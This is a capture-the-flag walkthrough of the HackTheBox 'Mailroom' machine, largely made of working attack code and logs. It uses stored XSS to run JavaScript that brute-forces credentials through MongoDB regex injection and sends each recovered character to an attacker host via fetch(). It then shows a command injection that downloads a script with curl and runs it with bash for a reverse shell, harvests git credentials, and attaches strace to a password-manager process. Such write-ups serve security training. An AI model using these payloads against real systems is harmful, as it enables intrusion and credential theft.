HackTheBox Mailroom (Hard): reproduction following a published walkthrough

Based on this uploader's videos:

Hack The Box seasonal box [MailRoom] System Flag walkthrough_哔哩哔哩_bilibili

Hack The Box seasonal box [MailRoom] User Flag walkthrough_哔哩哔哩_bilibili

 

Use the XSS in the message board to reach the internal staff page. That page (auth.php) has a MongoDB regular-expression injection; the username and password are blind-brute-forced one character at a time from the response: HTTP 200 with "success":true on a match, 401 otherwise. The injected script runs inside the headless Firefox that ai.py drives (origin http://127.0.0.1), and auth.php answers with Access-Control-Allow-Origin: *, which is what lets the script read the cross-origin response body at all.

git clone https://github.com/SrcVme50/Mailroom

guess_username.js

// Runs inside the headless Firefox that ai.py drives. For each candidate
// character c, ask auth.php whether some user's email matches
// .*c<suffix>@mailroom.htb; a "success":true answer means the username ends
// with c<suffix>, so report it and recurse with the longer suffix. The
// username is therefore recovered right-to-left.
function esc(s) {
    // escape regex metacharacters so "(" or "[" are tested literally instead
    // of aborting the MongoDB query with "Regular expression is invalid"
    return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}
function callAuth(mail) {
    var http = new XMLHttpRequest();
    http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.onload = function () {
        if (/"success":true/.test(this.responseText)) {
            notify(mail);
            cal(chars88, mail);
        }
    };
    // password[$ne]=abc is always true, so only the email clause decides.
    // URL-encode the candidate: a raw "+" is decoded as a space and "&" would split the body.
    http.send("email[$regex]=" + encodeURIComponent(".*" + esc(mail) + "@mailroom.htb") + "&password[$ne]=abc");
}
function notify(mail) {
    // exfiltrate each confirmed suffix to the attacker's http-server log
    fetch("http://10.10.14.50:30088/r8.sh?" + encodeURIComponent(mail));
}
function cal(chars, mail) {
    for (var i = 0; i < chars.length; i++) {
        callAuth(chars[i] + mail);
    }
}
var chars88 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[]_`{}~";
cal(chars88, "");

guess_password.js

// Same idea, but the email is now fixed to the account found by
// guess_username.js and the password is grown left-to-right with an anchored
// regex ^<prefix>c.
function esc(s) {
    // escape regex metacharacters so a candidate is matched literally
    return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}
function callAuth2(pass) {
    var http = new XMLHttpRequest();
    http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.onload = function () {
        if (/"success":true/.test(this.responseText)) {
            notify2(pass);
            cal2(chars99, pass);
        }
    };
    // email of the account recovered by guess_username.js
    http.send("email=" + encodeURIComponent("tristan@mailroom.htb") + "&password[$regex]=" + encodeURIComponent("^" + esc(pass)));
}
function notify2(pass) {
    fetch("http://10.10.14.50:30088/r8.sh?" + encodeURIComponent(pass));
}
function cal2(chars, pass) {
    for (var i = 0; i < chars.length; i++) {
        callAuth2(pass + chars[i]);
    }
}
var chars99 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#%'()+, -/:;<=>@[]_`{}~";
cal2(chars99, "");

root@071381841c9e:/var/www/staffroom# cat auth.php 
<?php
require 'vendor/autoload.php';

session_start(); // Start a session
$client = new MongoDB\Client("mongodb://mongodb:27017"); // Connect to the MongoDB database
header('Content-Type: application/json');
if (!$client) {
  header('HTTP/1.1 503 Service Unavailable');
  echo json_encode(['success' => false, 'message' => 'Failed to connect to the database']);
  exit;
}
$collection = $client->backend_panel->users; // Select the users collection

// Authenticate user & Send 2FA if valid
if (isset($_POST['email']) && isset($_POST['password'])) {

  // Verify the parameters are valid
  if (!is_string($_POST['email']) || !is_string($_POST['password'])) {
    header('HTTP/1.1 401 Unauthorized');
    echo json_encode(['success' => false, 'message' => 'Invalid input detected']);
  }

  // Check if the email and password are correct
  $user = $collection->findOne(['email' => $_POST['email'], 'password' => $_POST['password']]);

  if ($user) {
    // Generate a random UUID for the 2FA token
    $token = bin2hex(random_bytes(16));
    $now = time();

    // Update the user record in the database with the 2FA token if not already sent in the last minute
    $user = $collection->findOne(['_id' => $user['_id']]);
    if(($user['2fa_token'] && ($now - $user['token_creation']) > 60) || !$user['2fa_token']) {
        $collection->updateOne(
          ['_id' => $user['_id']],
          ['$set' => ['2fa_token' => $token, 'token_creation' => $now]]
        );

        // Send an email to the user with the 2FA token
        $to = $user['email'];
        $subject = '2FA Token';
        $message = 'Click on this link to authenticate: http://staff-review-panel.mailroom.htb/auth.php?token=' . $token;
        mail($to, $subject, $message);
    }
    // Return a JSON response notifying about 2fa
    echo json_encode(['success' => true, 'message' => 'Check your inbox for an email with your 2FA token']);
    exit;

  } else {
    // Return a JSON error response
    header('HTTP/1.1 401 Unauthorized');
    echo json_encode(['success' => false, 'message' => 'Invalid email or password']);
  }
}

// Check for invalid parameters
else if (!isset($_GET['token'])) {
  header('HTTP/1.1 400 Bad Request');
  echo json_encode(['success' => false, 'message' => 'Email and password are required']);
  exit;
}

// Check if the form has been submitted
else if (isset($_GET['token'])) {
  // Verify Token parameter is valid
  if (!is_string($_GET['token']) || strlen($_GET['token']) !== 32) {
    header('HTTP/1.1 401 Unauthorized');
    echo json_encode(['success' => false, 'message' => 'Invalid input detected']);
    exit;
  }

  // Check if the token is correct
  $user = $collection->findOne(['2fa_token' => $_GET['token']]);

  if ($user) {
    // Set the logged_in flag and name in the session
    $_SESSION['logged_in'] = true;
    $_SESSION['name'] = explode('@', $user['email'])[0];

    // Remove 2FA token since user already used it to log in
    $collection->updateOne(
      ['_id' => $user['_id']],
      ['$unset' => ['2fa_token' => '']]
    );

    // Redirect to dashboard since login was successful
    header('Location: dashboard.php');
    exit;
  } else {
    // Return a JSON error response
    header('HTTP/1.1 401 Unauthorized');
    echo json_encode(['success' => false, 'message' => 'Invalid 2FA Login Token']);
    exit;
  }
}


?>
root@071381841c9e:/var/www/staffroom# 

# As below. It was http://10.10.14.37:77/user.js before; later I found that Firefox refuses to connect to port 77 (high ports such as 8080 and 8090 are not restricted), so 77 was changed to 30088;

cd /tmp;
npm install -g http-server 
# -g / --global installs the module globally
http-server -p 30088 --cors=access-control-allow-origin &


 

curl -v -d 'email=123%40gmail.com&title=Ad_maga&message=<script+src%3d"http%3a//10.10.14.50:30088/guess_username.js"></script>'   http://mailroom.htb/contact.php

# curl http://mailroom.htb/inquiries/a527e53f4ffd0574844e7483ba0904a9.html |grep -C5 10.10.14.50

POST /contact.php HTTP/1.1
Host: mailroom.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://mailroom.htb
Connection: close
Referer: http://mailroom.htb/contact.php
Upgrade-Insecure-Requests: 1

email=12342%40gmail.com&title=Ad_maga&message=<script+src%3d"http%3a//10.10.14.37:30088/user.js"></script>
root@79585e1c3ddf:/var/www/mailroom/template# cat ai.py 
#!/usr/bin/python3
# This script is used to simulate the Ai visiting the page and rating if the inquery looks relevent or irrelevant
import os
import sys
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.firefox.service import Service

# "Hack" to fix Firefox not launching without a writable home directory
os.environ["HOME"] = "/tmp"

def main(id):
    options = Options()
    options.add_argument('--headless')
    driver = webdriver.Firefox(service=Service(executable_path='/var/www/mailroom/template/geckodriver', log_path='/dev/null'), options=options)
    driver.set_page_load_timeout(30)
    try:
        driver.get(f"http://127.0.0.1/inquiries/{id}.html")
        print(driver.title)
    finally:
        driver.close()

if __name__ == '__main__':
    if len(sys.argv) < 2 or len(sys.argv[1]) != 32:
        exit()
    main(sys.argv[1])
root@79585e1c3ddf:/var/www/mailroom/template# 

The following leaks the PHP file path. Passing arrays (email[]=qwe) fails the is_string() check, but that branch of auth.php only sets the 401 and echoes the error without exit, so execution continues into findOne() and the later header() call trips a "headers already sent" warning that prints /var/www/staffroom/auth.php:

root@mailroom:~#  curl -v -d "email[]=qwe&password[]=abc" http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 26
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 26 out of 26 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:19:20 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=58a2b1cce2a8d677a0f63c16d0fed89a; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 303
< Content-Type: application/json
< 
{"success":false,"message":"Invalid input detected"}<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/staffroom/auth.php:20) in <b>/var/www/staffroom/auth.php</b> on line <b>51</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
{"success":false,"message":"Invalid email or password"}root@mailroom:~# 
root@mailroom:~# 
root@mailroom:~#  curl -v -d 'email[$regex]=.*)@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 48
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 48 out of 48 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:24:00 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=9105dc031fc8878b739a6948f2d27b79; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 917
< Content-Type: application/json
< 
{"success":false,"message":"Invalid input detected"}<br />
<b>Fatal error</b>:  Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: unmatched parentheses in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php:316
Stack trace:
#0 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php(316): MongoDB\Driver\Server-&gt;executeQuery('backend_panel.u...', Object(MongoDB\Driver\Query), Array)
#1 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/FindOne.php(126): MongoDB\Operation\Find-&gt;execute(Object(MongoDB\Driver\Server))
#2 /var/www/staffroom/vendor/mongodb/mongodb/src/Collection.php(699): MongoDB\Operation\FindOne-&gt;execute(Object(MongoDB\Driver\Server))
#3 /var/www/staffroom/auth.php(24): MongoDB\Collection-&gt;findOne(Array)
#4 {main}
  thrown in <b>/var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php</b> on line <b>316</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
root@mailroom:~# 

Regular expression is invalid: unmatched parentheses (the stray ")" in the value). The error proves the POSTed string reaches MongoDB's regex engine unescaped.

root@mailroom:~#  curl -v -d 'email[$regex]=.*(@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 48
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 48 out of 48 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:27:33 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=87d6127a132d28b22f6e2336eb9e99e5; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 905
< Content-Type: application/json
< 
{"success":false,"message":"Invalid input detected"}<br />
<b>Fatal error</b>:  Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: missing ) in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php:316
Stack trace:
#0 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php(316): MongoDB\Driver\Server-&gt;executeQuery('backend_panel.u...', Object(MongoDB\Driver\Query), Array)
#1 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/FindOne.php(126): MongoDB\Operation\Find-&gt;execute(Object(MongoDB\Driver\Server))
#2 /var/www/staffroom/vendor/mongodb/mongodb/src/Collection.php(699): MongoDB\Operation\FindOne-&gt;execute(Object(MongoDB\Driver\Server))
#3 /var/www/staffroom/auth.php(24): MongoDB\Collection-&gt;findOne(Array)
#4 {main}
  thrown in <b>/var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php</b> on line <b>316</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
root@mailroom:~# 

 Regular expression is invalid: missing )

 curl -v -d 'email[$regex]=.*[@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;

<b>Fatal error</b>:  Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: missing terminating ] for character class in /var...

The ai.py script has a time limit (the 30-second driver.set_page_load_timeout(30)), so a single run will not necessarily recover the whole username and password; either retry several times or edit the script by hand to continue from the partial value.

[2023-05-02T12:48:39.661Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:40.571Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:41.191Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:42.313Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

[2023-05-02T12:50:07.703Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:16.170Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:17.026Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:17.700Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:18.075Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:19.371Z]  "GET /r8.sh?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:21.002Z]  "GET /r8.sh?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:23.135Z]  "GET /r8.sh?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:24.445Z]  "GET /r8.sh?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:26.546Z]  "GET /r8.sh?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:27.895Z]  "GET /r8.sh?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:30.574Z]  "GET /r8.sh?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:31.304Z]  "GET /r8.sh?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"


[2023-05-02T12:51:56.771Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:57.689Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:58.201Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:59.442Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:52:04.265Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

Next, a way to make use of the full 30-second limit:

curl -v -d 'email=qax%40gmail.com&title=maga2023&message=<script+src%3d"http%3a//10.10.14.50:30088/guess_username.js"></script><script+src%3d"http%3a//10.10.14.50:8090/?c=123"></script>'   http://mailroom.htb/contact.php

The generated HTML contains two script loaders; the second one is served by PHP (http://10.10.14.50:8090/):

<script src='http://10.10.14.50:30088/guess_username.js'></script>

<script src='http://10.10.14.50:8090/?c=123'></script>

The handler behind http://10.10.14.50:8090/?c=123 is:

echo "<?php set_time_limit(600);sleep(120);">/tmp/index.php ;

Start PHP with:

cat /tmp/index.php ;
setsid php -n -S 0.0.0.0:8090 -t /tmp&

Built this way, the Selenium browser on the server does not exit so quickly: driver.get() only returns once the page has loaded, and a <script src> that the attacker's server holds open for 120 seconds keeps the page in the loading state until the 30-second page-load timeout fires. Without it the tiny inquiry page finishes loading almost immediately and driver.close() kills the window while the injected XHRs are still running.

Within those 30 seconds the username is fully recovered and the password is a few characters short, so it needs to be continued (I did not bother continuing; a few more attempts were enough):

[2023-05-02T15:39:12.945Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:19.952Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:20.744Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:21.258Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:21.683Z]  "GET /r8.sh?stan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:23.333Z]  "GET /r8.sh?istan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:24.978Z]  "GET /r8.sh?ristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:26.546Z]  "GET /r8.sh?tristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"


[2023-05-02T15:39:54.784Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:55.901Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:56.770Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:57.557Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:59.597Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:02.004Z]  "GET /r8.sh?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:04.039Z]  "GET /r8.sh?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:06.605Z]  "GET /r8.sh?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:08.711Z]  "GET /r8.sh?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:10.680Z]  "GET /r8.sh?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:11.877Z]  "GET /r8.sh?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:14.318Z]  "GET /r8.sh?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:20.160Z]  "GET /r8.sh?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
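The block below is an added example and is not code from the writeup or from the SrcVme50/Mailroom repository. It folds guess_username.js and guess_password.js into one extraction routine that URL-encodes the form body, escapes regex metacharacters (a candidate such as "(" is then tested literally instead of aborting the query, as the curl experiments with unmatched parentheses showed), and takes an already-recovered partial value so a run cut off by ai.py's 30-second page-load timeout can be continued where the last one stopped. To run offline it talks to a constructed stand-in for auth.php's findOne() holding one made-up user record with the values recovered above; the send(body) interface, the synchronous probe (in the browser it would be a synchronous XHR, or the loop rewritten with async/await around fetch), the sample record and the error text of the stand-in are all assumptions.

```javascript
// Added example: combined, hardened version of guess_username.js /
// guess_password.js plus a constructed stand-in for auth.php so it runs offline.

const CHARSET =
  "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" +
  "!\"#$%'()+,-/:;<=>@[]_`{}~";

// Escape PCRE/JS metacharacters so a candidate such as "(" is tested literally
// instead of making MongoDB answer "Regular expression is invalid".
function regexEscape(s) {
  return s.replace(/[.*+?^${}()|[\]\\\/]/g, "\\$&");
}

// x-www-form-urlencoded body. Without encoding, "+" arrives as a space and
// "%", "#" or "&" corrupt the request; the original scripts send the raw value.
function buildBody(fields) {
  return Object.entries(fields)
    .map(([k, v]) => encodeURIComponent(k) + "=" + encodeURIComponent(v))
    .join("&");
}

// Generic one-character-at-a-time extraction. probe(candidate) must return true
// when the server answered "success":true. grow() prepends (username, walked
// right-to-left from the "@mailroom.htb" anchor) or appends (password, anchored
// with ^). `known` is a value already recovered by an earlier, cut-off run.
function extract(probe, known, grow) {
  let value = known;
  for (;;) {
    const next = Array.from(CHARSET).map((c) => grow(value, c)).find((cand) => probe(cand));
    if (next === undefined) return value;   // no character extends the match: done
    value = next;
  }
}

// send(body) -> response text (assumed interface; a synchronous XHR in the
// browser, the simulation below here).
function recoverCredentials(send, known = {}) {
  const ok = (body) => /"success":true/.test(body);
  const username = extract(
    (cand) => ok(send(buildBody({
      "email[$regex]": ".*" + regexEscape(cand) + "@mailroom\\.htb$",
      "password[$ne]": "abc",           // always true, so only the email clause decides
    }))),
    known.username || "", (v, c) => c + v);
  const password = extract(
    (cand) => ok(send(buildBody({
      email: username + "@mailroom.htb",
      "password[$regex]": "^" + regexEscape(cand),
    }))),
    known.password || "", (v, c) => v + c);
  return { username, password };
}

// ---- constructed stand-in for auth.php + MongoDB (not the real backend) ----

// PHP turns "name[$op]=v" into $_POST['name'] = ['$op' => v]; "+" decodes to a space.
function parseForm(body) {
  const out = {};
  for (const pair of body.split("&")) {
    const [k, v] = pair.split("=").map((s) => decodeURIComponent(s.replace(/\+/g, " ")));
    const m = /^(\w+)\[(\$\w+)\]$/.exec(k);
    if (m) (out[m[1]] = out[m[1]] || {})[m[2]] = v;
    else out[k] = v;
  }
  return out;
}

// findOne() semantics for the three value shapes the scripts send.
function matches(fieldValue, cond) {
  if (cond === undefined) return false;
  if (typeof cond === "string") return fieldValue === cond;
  if ("$regex" in cond) return new RegExp(cond.$regex).test(fieldValue);
  if ("$ne" in cond) return fieldValue !== cond.$ne;
  return false;
}

function fakeAuthServer(users) {
  return (body) => {
    const q = parseForm(body);
    try {
      const hit = users.find((u) => matches(u.email, q.email) && matches(u.password, q.password));
      return JSON.stringify(hit
        ? { success: true, message: "Check your inbox for an email with your 2FA token" }
        : { success: false, message: "Invalid email or password" });
    } catch (e) {                         // the PHP fatal error page, reduced to its message
      return "Regular expression is invalid: " + e.message;
    }
  };
}

// Constructed sample record using the values the writeup recovered.
const SAMPLE_USERS = [{ email: "tristan@mailroom.htb", password: "69trisRulez!" }];

console.log(recoverCredentials(fakeAuthServer(SAMPLE_USERS)));
```

Running the file prints the recovered pair; to continue an interrupted run, pass the partial values as the second argument, e.g. recoverCredentials(send, { username: "tristan", password: "69tr" }). In the browser, replace fakeAuthServer with a function that POSTs the body to auth.php and returns responseText, and swap console.log for the fetch()-based exfiltration the original scripts use.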

ssh only allows tristan to log in:

grep Match /etc/ssh/sshd_config;

# ssh -o StrictHostKeyChecking=no [email protected]

# password:   a$gBa3!GA8

ssh -o StrictHostKeyChecking=no [email protected]


tristan's password: 69trisRulez!

After the ssh login succeeds:

# Send the login request with curl (the same PHPSESSID must be reused for every later request, since the 2FA step marks this session as logged in):
 curl -v -d "email=tristan%40mailroom.htb&password=69trisRulez%21" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878"    http://staff-review-panel.mailroom.htb/auth.php;
# status 200 {"success":true,"message":"Check your inbox for an email with your 2FA token"}


grep -o -E "(http://.*)" /var/mail/tristan
# take the last one:
myurl2=$(grep -o -E "(http://.*)" /var/mail/tristan|tail -n 1);
echo $myurl2;



# visit the 2FA link from the mail:
#http://staff-review-panel.mailroom.htb/auth.php?token=2ae50255deba57587ac9f9555857beeb
curl -v -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" $myurl2|grep message
# status 302, redirected to dashboard.php (the session now carries logged_in=true)


# visit the dashboard; this step can be skipped:
#curl -v -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" http://staff-review-panel.mailroom.htb/dashboard.php



# inject the command (inspect.php's filter strips $ ( ) ; | & and quotes but not backticks or newlines, and "+" in the form body decodes to a space):
curl -v --data-binary "inquiry_id=\`sleep+12
curl+-o+/tmp/3r2+http://10.10.14.37:77/r0.sh
bash+/tmp/3r2
echo+-n+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php

Once the reverse shell is back, it turns out to be inside a container; run this one-liner to look for credentials:

cat /var/www/mailroom/.git/config /var/www/staffroom/.git/config

url = http://matthew:HueLover83%23@gitea:3000/matthew/mailroom.git

matthew's password (URL-decoded, %23 is "#") is:
HueLover83#

Back in the shell on the VM:

su - matthew

matthew@mailroom:~$ cat ~/user.txt
a371327b52dde700c969109e3315ac3c
matthew@mailroom:~$

ls -al /home/matthew/personal.kdbx;  python3 -V ;

Upload the password database to Kali with scp. I later found this step unnecessary: the kpcli already on the target can open it directly:
 

scp -P 40022 -o StrictHostKeyChecking=no \
/home/matthew/personal.kdbx [email protected]:/tmp/

Tip: the target is a VM that wipes /tmp automatically (cleanup.sh runs rm -rf /tmp/*, and that glob does not match names starting with a dot), so hidden files survive; that is why I save to /tmp/.pwd.log. Attaching strace works here because the kpcli process runs as matthew and this box permits the attach; on a default Ubuntu install Yama's ptrace_scope=1 would refuse to attach to a process that is not a descendant of strace.

#  strace   -o  /tmp/.pwd.log  -p  ` ps -ef|grep kpcli|grep perl|awk '{print $2}' `

matthew@mailroom:/tmp$ ./ps  aux
PID   USER     TIME  COMMAND
42939 matthew   0:00 -bash
43013 matthew   0:00 /lib/systemd/systemd --user
43019 matthew   0:00 {kpcli} /usr/bin/perl /usr/bin/kpcli
43023 matthew   0:00 ./ps aux
matthew@mailroom:/tmp$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
matthew    42939  0.2  0.1   8392  5148 pts/2    S    15:57   0:00 -bash
matthew    43013  0.6  0.2  19188  9764 ?        Ss   15:57   0:00 /lib/systemd/systemd --user
matthew    43019  1.2  0.6  29520 24468 ?        Ss   15:57   0:00 /usr/bin/perl /usr/bin/kpcli
matthew    43030  0.0  0.0   8888  3232 pts/2    R+   15:57   0:00 ps aux
matthew@mailroom:/tmp$ strace   -o  /tmp/.pwd.log  -p  ` ps -ef|grep kpcli|grep perl|awk '{print $2}' `
strace: option requires an argument -- 'p'
Try 'strace -h' for more information.
matthew@mailroom:/tmp$


